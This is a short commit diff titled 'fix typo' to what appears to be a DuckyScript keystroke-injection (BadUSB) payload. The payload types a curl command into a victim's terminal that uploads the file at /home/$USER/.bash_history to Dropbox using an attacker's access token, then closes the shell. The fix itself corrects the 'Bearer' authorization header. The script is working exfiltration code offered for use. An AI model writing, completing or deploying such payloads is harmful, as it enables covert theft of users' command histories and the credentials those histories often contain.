fix typo
parent
e7cffd1cd8
commit
b027af3ff6
|
@ -17,7 +17,7 @@ DELAY 500
|
|||
STRING curl -X POST https://content.dropboxapi.com/2/files/upload
|
||||
SPACE
|
||||
REM replace the [DROPBOX_ACCESS_TOKEN] placeholder with your actual Dropbox access token
|
||||
STRING --header "Authorization: Bea[DROPBOX_ACCESS_TOKEN]"
|
||||
STRING --header "Authorization: Bearer [DROPBOX_ACCESS_TOKEN]"
|
||||
SPACE
|
||||
STRING --header "Dropbox-API-Arg: {\"path\": \"/home/$USER/.bash_history\"}"
|
||||
SPACE
|
||||
|
@ -27,4 +27,4 @@ ENTER
|
|||
DELAY 500
|
||||
STRING exit
|
||||
DELAY 500
|
||||
ENTER
|
||||
ENTER
|
Loading…
Reference in New Issue